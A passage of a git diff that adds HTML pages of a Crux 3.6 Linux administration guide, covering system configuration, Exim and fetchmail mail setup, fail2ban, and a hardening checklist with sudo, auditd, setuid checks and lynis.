+         7) Bosnia & Herzegovina  24) Jersey                41) Serbia
+         8) Britain (UK)          25) Latvia                42) Slovakia
+         9) Bulgaria              26) Liechtenstein         43) Slovenia
+        10) Croatia               27) Lithuania             44) Spain
+        11) Czech Republic        28) Luxembourg            45) Svalbard & Jan Mayen
+        12) Denmark               29) Macedonia             46) Sweden
+        13) Estonia               30) Malta                 47) Switzerland
+        14) Finland               31) Moldova               48) Turkey
+        15) France                32) Monaco                49) Ukraine
+        16) Germany               33) Montenegro            50) Vatican City
+        17) Gibraltar             34) Netherlands
+        #? 37
+
+        Please select one of the following time zone regions.
+        1) mainland
+        2) Madeira Islands
+        3) Azores
+        #? 1
+
+        The following information has been given:
+
+            Portugal
+            mainland
+
+        Therefore TZ='Europe/Lisbon' will be used.
+        Local time is now:      Sun Aug  9 17:36:05 WEST 2016.
+        Universal Time is now:  Sun Aug  9 16:36:05 UTC 2016.
+        Is the above information OK?
+        1) Yes
+        2) No
+        #? 1
+
+        You can make this change permanent for yourself by appending the line
+            TZ='Europe/Lisbon'; export TZ
+        to the file '.profile' in your home directory; then log out and log in again.
+
+        Here is that TZ value again, this time on standard output so that you
+        can use the /usr/bin/tzselect command in shell scripts:
+        Europe/Lisbon
+        #
+        </pre>
+
+        <h2 id="locale">1.2.3. Set locale</h2>
+
+
+        <pre>
+        # localedef -i en_US -f UTF-8 en_US.UTF-8
+        </pre>
+
+        <h2 id="user">1.2.4. Users</h2>
+
+        <h3>1.2.4.1. Set root password</h3>
+
+        <pre>
+        # passwd
+        </pre>
+
+        <h3>1.2.4.2. Create Administrator User</h3>
+
+	<p>Description of most default pretinent groups;</p>
+
+	<dl>
+		<dt>adm</dt>
+		<dd>Administration group.</dd>
+		<dt>ftp</dt>
+		<dd>Access to files served by ftp.</dd>
+		<dt>users</dt>
+		<dd>Standard users group.</dd>
+		<dt>wheel</dt>
+		<dd>Administration group used to give access to sudo.</dd>
+	</dl>
+
+        <pre>
+        # useradd -U -m -k /etc/skel -s /bin/bash username
+        # usermod -G adm,wheel,audio,input,video,users username
+        # passwd username
+        </pre>
+
+        <pre>
+        # chmod 0700 /root
+        # chmod 0700 /home/username
+        </pre>
+
+        <h3>1.2.4.3 Add Administrator to Wheel group</h3>
+
+        <pre>
+        bash-4.3# sudoedit /etc/sudoers
+        </pre>
+
+        <pre>
+        ## Uncomment to allow members of group wheel to execute any command
+        %wheel ALL=(ALL) ALL
+        </pre>
+
+        <h2 id="fstab">1.2.5. File system table</h2>
+
+        <p>First we will discover block id (UUID) of
+        <a href="install.html#step2">target partition</a>,
+        blkid list all while vol_id --uuid /dev/sdb1 returns
+        only uuid. Add all block ids to the end of file
+        /etc/fstab;
+        </p>
+
+        <pre>
+        # blkid >> /etc/fstab
+        </pre>
+
+        <p>Read <a href="http://linux-audit.com/securing-mount-points-on-linux/" title="Securing mount points">Securing mount points</a>,
+        and edit /etc/fstab according to your disk layout. Blocks with uuid will later be created at <a href="../tools/lvm.html">lvm</a>.</p>
+
+        <p>Pass option control in wich order fsck checks devices. If is
+        a multiple partition scheme; 1 for root, 2 for others or 0 to
+        disable fsck. In this example fsck in usr partition is disable,
+        initram file system mounted on boot making impossible to run fsck.</p>
+
+        <pre>
+        /dev/sda3  				   / 		ext4	defaults,noatime,ro				0	1
+        # usr is not checked because is already mounted by init ram (to be fixed).
+        UUID=20bd3948-0877-4192-af52-ad87d6f96db0  /usr		ext4	defaults,ro,nodev,errors=remount-ro		0	0
+        devpts                 		           /dev/pts	devpts	noexec,nosuid,gid=tty,mode=0620			0	0
+        none                                       /sys/kernel/security securityfs defaults                             0       0
+        devpts                 		           /dev/pts	devpts	noexec,nosuid,gid=tty,mode=0620			0	0
+        shm                   			   /dev/shm	tmpfs	defaults                                        0       0
+        tmp                                        /tmp         tmpfs   defaults,noatime,nosuid,nodev,noexec,size=128M  0       0
+        UUID=3b408790-65e1-4638-9591-7ba61f266913  /boot	ext4	defaults,ro,noatime		  		0	2
+        UUID=962D-0DE1				   /boot/efi	vfat	ro,noauto,umask=0077      			0	2
+        UUID=f2336a56-fbe6-444c-bdbf-f0e6c209c237  /var		ext4	defaults,nodev,noexec,nosuid,errors=remount-ro  0	2
+        UUID=66c083d6-b8f2-4a98-ae55-9412f98cc089  /usr/ports	ext4	defaults,ro,nodev,errors=remount-ro		0	2
+        pkgmk                                      /usr/ports/work tmpfs   size=30G,gid=101,uid=100,defaults 		0       2
+        UUID=36e9e1d5-8356-451e-a301-81098b9a15ea  /srv		ext4	defaults,nodev,errors=remount-ro		0	2
+        UUID=cd15196a-69f1-4fb4-9730-a384c62add91  /home        ext4    defaults,nodev,nosuid,errors=remount-ro		0	2
+        #UUID=04f07488ce7b36205acc6d404dcf924643660ac5  /usr/ports/distfiles	ext4	defaults,ro,nodev,errors=remount-ro		0	2
+        # End of file
+        </pre>
+
+        <h2 id="rcconf">1.2.6. Initialization Scripts</h2>
+
+        <p>Edit /etc/rc.conf and define keyboard layout, hostname and timezone,
+        more information about
+        <a href="http://crux.nu/Main/Handbook3-3#ConfigurationVariables">configuration variables</a>.
+        </p>
+
+        <pre>
+        #
+        # /etc/rc.conf: system configuration
+        #
+
+        FONT=default
+        KEYMAP=dvorak
+        TIMEZONE="Europe/Lisbon"
+        HOSTNAME=machine
+        SYSLOG=sysklogd
+        SERVICES=(lo iptables wlan crond)
+
+        # End of file
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+    </body>
+</html>
diff --git a/linux/dash.html b/linux/dash.html
new file mode 100644
index 0000000..47b9945
--- /dev/null
+++ b/linux/dash.html
@@ -0,0 +1,28 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.3.1. Dash</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>2.3.1. Dash</h1>
+
+
+        <p>By default dash installed as /bin/sh, if not relink;</p>
+
+        <pre>
+        # ln -sfT dash /bin/sh
+        </pre>
+
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+    </body>
+</html>
diff --git a/linux/exim.html b/linux/exim.html
new file mode 100644
index 0000000..5cfed62
--- /dev/null
+++ b/linux/exim.html
@@ -0,0 +1,233 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.5. Exim</title>
+    </head>
+    <body>
+        <a href="index.html">GNU/Linux Index</a>
+        <h1>2.5. Exim</h1>
+
+        <h2 id="conf">2.5.1. Exim Configuration</h2>
+
+        <p>Exim come with default configuration we will change to mach system settings
+        <a href="conf/etc/exim/exim.conf">/etc/exim/exim.conf</a>.</p>
+
+        <pre>
+        $ sudo prt-get depinst mailx
+        </pre>
+
+        <h2 id="cert">2.5.2. Certificates</h2>
+
+        <p>Exim creates a key for you if you just copy exim.conf and start daemon;</p>
+
+        <pre>
+        # cp /home/username/data/git/doc/core/conf/exim/exim.conf /etc/exim/exim.conf
+        # sh /etc/rc.d/exim start
+        SSL certificate /etc/ssl/certs/exim.crt with key /etc/ssl/keys/exim.key for host machine.example created
+        #
+        </pre>
+
+        <p>Manually create a private key;</p>
+
+        <pre>
+	$ sudo mkdir /etc/ssl/keys
+	</pre>
+
+        <pre>
+	$ sudo openssl req -x509 -newkey rsa:2048 -keyout /etc/ssl/keys/exim.key -out /etc/ssl/certs/exim.cert -days 9000 -nodes
+	Generating a 2048 bit RSA private key
+	...........................................+++
+	..............+++
+	writing new private key to '/etc/ssl/keys/exim.key'
+	-----
+	You are about to be asked to enter information that will be incorporated
+	into your certificate request.
+	What you are about to enter is what is called a Distinguished Name or a DN.
+	There are quite a few fields but you can leave some blank
+	For some fields there will be a default value,
+	If you enter '.', the field will be left blank.
+	-----
+	Country Name (2 letter code) [AU]:PT
+	State or Province Name (full name) [Some-State]:
+	Locality Name (eg, city) []:
+	Organization Name (eg, company) [Internet Widgits Pty Ltd]:
+	Organizational Unit Name (eg, section) []:
+	Common Name (e.g. server FQDN or YOUR name) []:machine.example.org
+	Email Address []:postmaster@machine.example.org
+	#
+        </pre>
+
+    	<pre>
+	# chown mail:mail /etc/ssl/keys/exim.key
+	# chmod 0600 /etc/ssl/keys/exim.key
+	# chmod 644 /etc/ssl/certs/exim.cert
+	</pre>
+
+        <h2 id="alias">2.5.3. Aliases</h2>
+
+        <p>Exim come with default aliases we will change to mach system settings
+        <a href="conf/etc/exim/aliases">/etc/exim/aliases;</a></p>
+
+        <pre>
+        # Default aliases file, installed by Exim. This file contains no real aliases.
+        # You should edit it to taste.
+
+        # The following alias is required by the mail RFCs 2821 and 2822.
+        # Set it to the address of a HUMAN who deals with this system's mail problems.
+
+        postmaster: machine-admin
+
+        # It is also common to set the following alias so that if anybody replies to a
+        # bounce message from this host, the reply goes to the postmaster.
+
+        mailer-daemon: postmaster
+
+        # You should also set up an alias for messages to root, because it is not
+        # usually a good idea to deliver mail as root.
+
+        root: postmaster
+
+        # It is a good idea to redirect any messages sent to system accounts so tha
+        # they don't just get ignored. Here are some common examples:
+
+        bin: root
+        daemon: root
+        ftp: root
+        nobody: root
+        operator: root
+        uucp: root
+
+        # You should check your /etc/passwd for any others.
+
+        # Other commonly enountered aliases are:
+        #
+        # abuse:       the person dealing with network and mail abuse
+        # hostmaster:  the person dealing with DNS problems
+        # webmaster:   the person dealing with your web site
+
+        ####
+        </pre>
+
+        <h2 id="smarthost">2.5.4. Smarthost</h2>
+
+        <p>Tony Finch publish a nice
+        <a href="http://www-uxsup.csx.cam.ac.uk/~fanf2/hermes/conf/exim/etc/etc.cam/configure">configuration reference</a>.
+        </p>
+
+        <p>File /etc/exim/alias rewrite addresses when receiving,
+        return_path and headers_rewrite rewrite addresses in header
+        (envelop) while main rewrite apply rewriting to all.</p>
+
+        <p>Test sender rewriting;</p>
+
+        <pre>
+        # exim -brw bob@box
+        # exim -brw bob@remote.com
+        </pre>
+
+        <p>Test routing;</p>
+
+        <pre>
+        # exim -bt bob@box
+        # exim -bt bob@remote.com
+        </pre>
+
+        <h2 id="fetchmail">2.5. Fetchmail</h2>
+
+        <pre>
+        $ prt-get depinst fetchmail
+        </pre>
+
+        <pre>
+        $ sudo su
+        # mkdir /var/lib/fetchmail
+        # mkdir /var/run/fetchmail
+        # useradd -r fetchmail
+        # chown fetchmail /var/lib/fetchmail
+        # chown fetchmail /var/run/fetchmail
+        </pre>
+
+        <p>Create /etc/rc.d/fetchmail and add fetchmail to /etc/rc.conf;</p>
+
+        <pre>
+        #!/bin/sh
+        #
+        # /etc/rc.d/fetchmail: start/stop fetchmail daemon
+        #
+
+        SSD=/sbin/start-stop-daemon
+        PROG=/usr/bin/fetchmail
+        PID=/var/run/fetchmail/fetchmail.pid
+        IDS=/var/lib/fetchmail/.fetchids
+        PUID=45
+        PGID=100
+        OPTS="-f /etc/fetchmailrc -i $IDS --pidfile $PID --syslog -v"
+
+        case $1 in
+        start)
+                $SSD --chuid $PUID:$PGID --user $PUID --exec $PROG --start -- $OPTS
+                ;;
+        stop)
+                $SSD --stop --remove-pidfile --retry 10 --pidfile $PID
+                ;;
+        restart)
+                $0 stop
+                $0 start
+                ;;
+        reload)
+                $SSD --stop --signal HUP --pidfile $PID
+                ;;
+        status)
+                $SSD --status --pidfile $PID
+                case $? in
+                0) echo "$PROG is running with pid $(head -1 $PID)" ;;
+                1) echo "$PROG is not running but the pid file $PID exists" ;;
+                3) echo "$PROG is not running" ;;
+                4) echo "Unable to determine the program status" ;;
+                esac
+                ;;
+        *)
+                echo "usage: $0 [start|stop|restart|reload|status]"
+                ;;
+        esac
+        # End of file
+        </pre>
+
+        <p>Create /etc/fetchmailrc;</p>
+
+        <pre>
+        # This file must be chmod 0600, owner fetchmail
+
+        set daemon        300           # Pool every 5 minutes
+        set syslog                      # log through syslog facility
+        set postmaster  admin@box
+
+        set no bouncemail               # avoid loss on 4xx errors
+                                        # on the other hand, 5xx errors get
+                                        # more dangerous...
+
+        ##########################################################################
+        # Hosts to pool
+        ##########################################################################
+
+        # Defaults ===============================================================
+        # Set antispam to -1, since it is far safer to use that together with
+        # no bouncemail
+        defaults:
+        timeout 300
+        antispam -1
+        batchlimit 100
+
+        poll pop.remote.com protocol POP3 user "drbob@remote.com" there with password "secretpass" is "bob@box" here
+        </pre>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>
+        This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+    </body>
+</html>
diff --git a/linux/fail2ban.html b/linux/fail2ban.html
new file mode 100644
index 0000000..71bbdf9
--- /dev/null
+++ b/linux/fail2ban.html
@@ -0,0 +1,54 @@
+<!DOCTYPEhtml>
+<htmldir="ltr" lang="en">
+   <head>
+       <meta charset='utf-8'>
+       <title>Fail2ban</title>
+   </head>
+   <body>
+
+       <a href="index.html">Tools Index</a>
+
+       <h1>Fail2ban</h1>
+
+       <pre>
+       $ prt-get depinst fail2ban
+       </pre>
+
+       <h2 id="conf">1. Configure</h2>
+
+       <p>To start fail2ban at next boot edit /etc/rc.conf and add fail2ban.
+       Fail2ban will verify if /etc/fail2ban/jail.local exist, if exist will
+       use it. Copy distribution jail.conf to jail.locol;</p>
+
+       <pre>
+       $ sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
+       </pre>
+
+       <p>Edit /etc/fail2ban/jail.local, example configuration;</p>
+
+       <pre>
+       [ssh-iptables]
+
+       enabled  = enable
+       filter   = sshd
+       action   = iptables[name=SSH, port=ssh, protocol=tcp]
+                  sendmail-whois[name=SSH, dest=admin@box, sender=fail2ban@box, sendername="fail2ban"]
+                  logpath  = /var/log/auth
+                  maxretry = 5
+       </pre>
+
+       <p>Test a filter</p>
+
+        <pre>
+        # fail2ban-regex /var/log/iptables iptables-ssh.conf
+        </pre>
+
+        <a href="index.html">Tools Index</a>
+
+        <p>
+        This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a> for copying conditions.</p>
+    </body>
+</html>
diff --git a/linux/hardening.html b/linux/hardening.html
new file mode 100644
index 0000000..0fd13e3
--- /dev/null
+++ b/linux/hardening.html
@@ -0,0 +1,188 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>2.6. Hardening</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>2.6. Hardening</h1>
+
+        <h2>2.6.0.2 System security</h2>
+
+        <dl>
+            <dt>File systems</dt>
+            <dd>Check <a href="install.html#fstab">fstab</a> and current mount options. Mount filesystems in read only, only strict necessary in rw.</dd>
+            <dt>Sys</dt>
+            <dd>Check kernel settings with <a href="sysctl.html">sysctl</a>.</dd>
+            <dd>kernel.yama.ptrace_scope breaks gdb, strace, perf trace and reptyr.</dd>
+            <dt>Iptables</dt>
+            <dd>Check if <a href="network.html#iptables">iptables</a> rules are loaded and are correctly logging.(firewald works as API to iptables).</dd>
+            <dt>Apparmor</dt>
+            <dd>Check if <a href="apparmor.html">apparmor</a> is active and enforcing policies.</dd>
+            <dt>Samhain</dt>
+            <dd>Check if <a href="samhain.html">samhain</a> is running.</dd>
+            <dt>Toolchain</dt>
+            <dd>Build ports using hardened <a href="toolchain.html">toolchain</a> settings.</dd>
+        </dl>
+
+
+        <pre>
+        $ sudo prt-get depinst checksec
+        </pre>
+
+        <h2>2.6.0.1 System configuration</h2>
+
+        <h3>1.1 - Users groups, passwords and sudo.</h3>
+
+        <p>Check "normal" users groups, make sure they are not admin or wheel group; ps -U root -u root u, ps axl | awk '$7 != 0 &amp;&amp; $10 !~ "Z"', process permission; ps -o gid,rdig,supgid -p "$pid"</p>
+
+        <p>Maintain, secure with hash, and enforce secure passwords with pam-cracklib.</p>
+
+
+        <h3>1.2 - Linux PAM</h3>
+
+        <p>Cat /etc/pam.d/system-auth. Check pam modules, test on virtual machine, user can lockout during tests. Check files (processes); getfacl filename.</p>
+
+        <p>Check files (processes) set uid and set gid;</p>
+
+        <pre>
+        # find / -perm 4000 >> /root/setuid_files
+        # find / -perm 2000 >> /root/setguid_files
+        </pre>
+
+        <p>To setuid (4744);</p>
+
+        <pre>
+        # chmod u+s filename
+        </pre>
+
+        <p>To remove (0664) from su and Xorg (user must be part of input and video for xorg to run);</p>
+
+        <pre>
+        # chmod u-s /usr/bin/su
+        # chmod u-s /usr/bin/X
+        </pre>
+
+        <p>To set gid (2744)</p>
+        <pre>
+        # chmod g+s filename
+        </pre>
+        <p>To remove (0774);</p>
+        <pre>
+        # chmod g-s filename
+        </pre>
+
+        <p>Find world writable files;</p>
+
+        <pre>
+        # find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
+        </pre>
+
+        <p>No owner files;</p>
+
+        <pre>
+        # find /dir -xdev \( -nouser -o -nogroup \) -print
+        </pre>
+
+        <h3>1.3. Capabilities</h3>
+
+        <p>Check capabilities;</p>
+        <pre>
+        # getcap filename
+        </pre>
+
+            <dd>1.9 - Limit number of processes.</dd>
+            <dd>1.10 - Lock user after 3 failed loggins.</dd>
+            <dd>1.8 - Block host ip based on iptable and services
+            abuse.</dd>
+        </dl>
+
+        <h3>1.4 Sudo</h3>
+
+        <p>Check sudo, sudoers and sudo replay.</p>
+
+        <p>Don't run editor as root, instead run sudoedit filename or sudo --edit filename. Editor can be set as a environment variable;</p>
+
+        <pre>
+        $ export SUDO_EDITOR=vim
+        </pre>
+
+        <p>Set rvim as default on sudo config;</p>
+
+        <pre>
+        # visudo
+
+        Defaults editor=/usr/bin/rvim
+        </pre>
+
+        <p>Once sudo is correctly configured, disable root login;</p>
+
+        <pre>
+        # passwd --lock root
+        </pre>
+
+        <h3>1.5 Auditd</h3>
+
+        <pre>
+        $ prt-get depinst audit
+        </pre>
+
+        <p>Example audit when file /etc/passwd get modified;</p>
+
+        <pre>
+        $ auditctl -w /etc/passwd -p wa -k passwd_changes
+        </pre>
+
+        <p>Audit when a module get's loaded;</p>
+
+        <pre>
+        # auditctl -w /sbin/insmod -p x -k module_insertion
+        </pre>
+
+        <h3>1.6 Network</h3>
+
+        <p>Find listening services with command;</p>
+
+        <pre>
+        # ss -tulpn
+        # nmap -sT -O localhost
+        # nmap -sT -O machine.example.org
+        </pre>
+
+        <h2>2.6.0.2 Lynis</h2>
+
+        <pre>
+        $ sudo prt-get depinst lynis
+        </pre>
+
+        <p>Lynis gives a view of system overall configuration,
+        without changing default profile it runs irrelevant tests.
+        Create a lynis profile by coping default one and run lynis;</p>
+
+        <pre>
+        $ sudo cp /etc/lynis/default.prf /etc/lynis/custom.prf
+        $ sudo lynis configure settings color=yes
+        $ sudo lynis show settings
+        $ sudo lynis show profile
+        </pre>
+
+        <pre>
+        $ lynis audit system > lynis_report
+        $ mv /tmp/lynis.log .
+        $ mv /tmp/lynis-report.dat .
+        </pre>
+
+        <p>Add unnecessary tests to profile to have less noise.</p>
+
+        <a href="index.html">GNU/Linux Index</a>
+        <p>This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/index.html b/linux/index.html
new file mode 100644
index 0000000..c9a130f
--- /dev/null
+++ b/linux/index.html
@@ -0,0 +1,212 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>GNU/Linux</title>
+    </head>
+    <body>
+
+        <a href="../index.html">Documentation Index</a>
+
+        <h1>GNU/Linux</h1>
+
+        <p>GNU/Linux covers installation and configuration of
+        basic functionality of Crux 3.6 Gnu\Linux operating system.
+        This documentation try's to follow Crux HandBook installation
+        method diverges, for example, by only installing and
+        documenting gpt and grub2.<p>
+
+        <p>Read <a href="https://crux.nu/Main/Handbook3-5">Crux HandBook</a>,
+        you can ask for help on freenode #crux. Check <a href="scripts/">scripts</a>
+        folder the install process is automated and <a href="ports/">ports</a>
+        for extra ports used during the installation.</p>
+
+        <h2>1. Install Crux 3.6 Gnu/Linux</h2>
+
+        <ul>
+            <li><a href="install.html">1.1. Install Crux 3.6</a>
+                <ul>
+                    <li><a href="install.html#step1">1.1.1. Download</a></li>
+                    <li><a href="install.html#step2">1.1.2. Prepare target</a></li>
+                    <li><a href="install.html#step3">1.1.3. Prepare install</a></li>
+                    <li><a href="install.html#step4">1.1.4. Install</a></li>
+                    <li><a href="install.html#step5">1.1.5. Install extra packages</a></li>
+                    <li><a href="install.html#step6">1.1.6. Install extra ports</a></li>
+                    <li><a href="install.html#step7">1.1.7. DNS Resolver</a></li>
+                    <li><a href="install.html#step8">1.1.8. Install Handbook</a></li>
+                    <li><a href="install.html#step9">1.1.9. Install Skeletons</a></li>
+                </ul>
+            </li>
+
+            <li><a href ="configure.html">1.2. Configure</a>
+                <ul>
+                    <li><a href="configure.html#hostname">1.2.1. Set hostname and hosts</a></li>
+                    <li><a href="configure.html#time">1.2.2. Set timezone</a></li>
+                    <li><a href="configure.html#locale">1.2.3. Set lacale</a></li>
+                    <li><a href="configure.html#user">1.2.4. Users</a></li>
+                    <li><a href="configure.html#fstab">1.2.5. File system table</a></li>
+                    <li><a href="configure.html#rcconf">1.2.6. Initialization scripts</a></li>
+                </ul>
+            </li>
+            <li><a href="reboot.html">1.3. Boot</a>
+                <ul>
+                    <li><a href="reboot.html#linux">1.3.1. Kernel</a></li>
+                    <li><a href="reboot.html#dracut">1.3.2. Dracut</a></li>
+                    <li><a href="reboot.html#grub">1.3.3. Grub</a></li>
+                    <li><a href="reboot.html#recover">1.3.4. Recover</a></li>
+                    <li><a href="reboot.html#checkup">1.3.5. Checkup</a></li>
+                </ul>
+            </li>
+
+            <li><a href="ports.html">1.4. Ports</a>
+                <ul>
+                    <li><a href="ports.html#filesystem">1.4.1. Ports layout</a></li>
+                    <li><a href="ports.html#fakeroot">1.4.2. Build as user</a></li>
+                    <li><a href="ports.html#pkgmk">1.4.3. Configure pkgmk</a></li>
+                    <li><a href="ports.html#prtget">1.4.4. Configure prt-get</a></li>
+                    <li><a href="ports.html#distcc">1.4.5. Ccache and distcc</a></li>
+                </ul>
+            </li>
+
+
+        </ul>
+
+        <h2>2. System Administration</h2>
+
+        <ul>
+
+            <li><a href="linux.html">2.1. Linux Kernel</a>
+                <ul>
+                    <li><a href="linux.html#download">2.1.1. Download</a></li>
+
+                    <li><a href="linux.html#configure">2.1.2. Configure</a>
+                        <ul>
+                            <li><a href="linux.html#general">2.1.2.1. General Setup</a></li>
+                            <li><a href="linux.html#mod">2.1.2.2, Enable loadable module support</a></li>
+                            <li><a href="linux.html#block">2.1.2.3. Enable the block layer</a></li>
+                            <li><a href="linux.html#proc">2.1.2.4. Processor type and features</a></li>
+                            <li><a href="linux.html#acpi">2.1.2.5 Power management and ACPI options</a></li>
+                            <li><a href="linux.html#bus">2.1.2.6. Bus options (PCI etc.)</a></li>
+                            <li><a href="linux.html#exec">2.1.2.7. Executable file formats / Emulations</a></li>
+                            <li><a href="linux.html#net">2.1.2.8. Networking support</a></li>
+                            <li><a href="linux.html#drivers">2.1.2.9. Device Drivers</a></li>
+                            <li><a href="linux.html#firm">2.1.2.10. Firmware Drivers</a></li>
+                            <li><a href="linux.html#fs">2.1.2.11. File systems</a></li>
+                            <li><a href="linux.html#hack">2.1.2.12. Kernel hacking</a></li>
+                            <li><a href="linux.html#sec">2.1.2.13. Security options</a></li>
+                            <li><a href="linux.html#crypt">2.1.2.14. Cryptographic API</a></li>
+                            <li><a href="linux.html#virt">2.1.2.15. Virtualization</a></li>
+                            <li><a href="linux.html#lib">2.1.2.16. Library routines</a></li>
+                        </ul>
+
+                    </li>
+                    <li><a href="linux.html#build">2.1.3. Build</a></li>
+                    <li><a href="linux.html#install">2.1.5. Install</a></li>
+                    <li><a href="linux.html#remove">2.1.6. Remove</a></li>
+                </ul>
+            </li>
+
+            <li><a href="package.html">2.2. Package Management</a>
+                <ul>
+                    <li><a href="package.html#sysup">2.2.1. Update system</a></li>
+                    <li><a href="package.html#depinst">2.2.2. Install ports and dependencies</a></li>
+                    <li><a href="package.html#ports">2.2.3. Ports collections</a></li>
+                    <li><a href="package.html#info">2.2.3. Show port information</a></li>
+                    <li><a href="package.html#depends">2.2.4. Show port dependencies</a></li>
+                    <li><a href="package.html#printf">2.2.5. Print information</a></li>
+                </ul>
+            </li>
+
+            <li><a href="tty-terminal.html">2.3. Terminals and shells</a>
+                <ul>
+                    <li><a href="dash.html">2.3.1. Dash</a></li>
+                    <li><a href="bash.html">2.3.2. Bash</a></li>
+                </ul>
+            </li>
+	    <li><a href="syslog-ng.html">2.4. Syslog-ng</a>
+		<ul>
+		    <li><a href="syslog-ng.html#install">Install syslog-ng</a></li>
+		    <li><a href="syslog-ng.html#configure">Configure syslog-ng</a></li>
+		    <li><a href="logrotate.html">Logrotate</a></li>
+		    <li><a href="logwatch.html">Logwatch</a>
+			<ul>
+			    <li><a href="logwatch.html#conf">Configure Logwatch</a></li>
+			    <li><a href="logwatch.html#cron">Set cron task</a></li>
+			</ul>
+		    </li>
+	        </ul>
+            </li>
+
+            <li><a href="exim.html">2.5. Exim</a>
+                <ul>
+                    <li><a href="exim.html#conf">2.5.1. Exim configuration</a></li>
+                    <li><a href="exim.html#cert">2.5.2. Certificates</a></li>
+                    <li><a href="exim.html#alias">2.5.3. Aliases</a></li>
+                    <li><a href="exim.html#smarthost">2.5.4. Smarthost</a></li>
+                    <li><a href="exim.html#fetchmail">2.5.5. Fetchmail</a></li>
+                </ul>
+            </li>
+            <li><a href="hardening.html">2.6. Hardening</a>
+                <ul>
+                    <li><a href="apparmor.html">2.6.1. AppArmor</a>
+                        <ul>
+                            <li><a href="apparmor.html#install">2.6.1.1 Install</h2></li>
+                            <li><a href="apparmor.html#configure">2.6.1.2 Configure</h2></li>
+                            <li><a href="apparmor.html#profiles">2.6.1.3 Profiles</h2></li>
+                            <li><a href="apparmor.html#audit">2.6.1.4 Profile with audit</h2></li>
+                            <li><a href="apparmor.html#edit">2.6.1.5 Edit profiles</h2></li>
+                            <li><a href="apparmor.html#speedup">2.6.1.6 Speedup startup</h2></li>
+                        </ul>
+                    </li>
+                    <li><a href="sysctl.html">2.6.2. Sysctl</a></li>
+                    <li><a href="toolchain.html">2.6.3. Toolchain</a></li>
+                    <li><a href="samhain.html">2.6.4. Samhain</a></li>
+		    <li><a href="fail2ban.html">2.6.5 Fail2ban</a></li>
+                </ul>
+            </li>
+
+
+            <li><a href="network.html">2.7. Network</a>
+                <ul>
+                    <li><a href="network.html#resolv">2.7.1. Resolver</a></li>
+                    <li><a href="network.html#static">2.7.2. Static ip</a></li>
+                    <li><a href="network.html#iptables">2.7.3. Iptables</a></li>
+                    <li><a href="network.html#bridge">2.7.4. Bridges</a></li>
+                    <li><a href="network.html#wpa">2.7.5. Wpa and dhcpd</a></li>
+                    <li><a href="network.html#nm">2.7.6. NetworkManager</a></li>
+		    <li><a href="dnsmasq.html">2.7.7. Dnscrypt and Dnsmasq</a></li>
+		    <li><a href="tcpdump.html">2.7.8. Tcpdump</a></li>
+		    <li><a href="nmap.html">2.7.9. Nmap</a></li>
+		    <li><a href="wireless.html">2.7.10 Wireless</a></li>
+		</ul>
+	    </li>
+	    <li><a href="storage.html">2.4 Storage</a>
+		<ul>
+		    <li><a href="storage.html#fsck">1. Maintenance</a></li>
+		    <li><a href="storage.html#mv">2. Moving data</a></li>
+		    <li><a href="storage.html#resize">2. Resize</a></li>
+		</ul>
+	    </li>
+	    <li><a href="lvm.html">2.5. LVM</a>
+		<ul>
+		    <li><a href="lvm.html#lvmpart">1. LVM partition</a></li>
+		    <li><a href="lvm.html#pv">2. Create physical volume</a></li>
+		    <li><a href="lvm.html#vg">3. Create volume group</a></li>
+		    <li><a href="lvm.html#lv">4. Create logical volume</a></li>
+		    <li><a href="lvm.html#fsck">5. Maintenance</a></li>
+		</ul>
+	    </li>
+
+        </ul>
+
+        <a href="../index.html">Documentation Index</a>
+
+        <p>
+        This is part of the LeetIO System Documentation.
+        Copyright (C) 2021
+        LeetIO Team.
+        See the file <a href="../fdl-1.3-standalone.html">Gnu Free Documentation License</a>
+        for copying conditions.</p>
+
+    </body>
+</html>
diff --git a/linux/install.html b/linux/install.html
new file mode 100644
index 0000000..299027e
--- /dev/null
+++ b/linux/install.html
@@ -0,0 +1,408 @@
+<!DOCTYPE html>
+<html dir="ltr" lang="en">
+    <head>
+        <meta charset='utf-8'>
+        <title>1.1. Install Crux 3.6</title>
+    </head>
+    <body>
+
+        <a href="index.html">GNU/Linux Index</a>
+
+        <h1>1.1. Install Crux 3.6</h1>
+
+        <p>Installation of minimal Crux 3.6 Gnu\Linux system,
+        with selected packages from core, opt and contrib
+        ports. Process of installation documented can be
+        executed from iso or from existing gnu\linux installation.
+        Read
+        <a href="http://crux.nu/Main/Handbook3-6">Hand book 3.6</a>,
+        .</p>
+
+        <p>If you are booting from crux iso and is not your keyboard
+        layout of choice run;</p>
+
+        <pre>
+        # loadkeys dvorak
+        </pre>
+
+        <h2 id="step1">1.1.1. Download iso</h2>
+
+        <p>Visit crux
+        <a href="http://crux.nu/Main/Download">download page</a> for
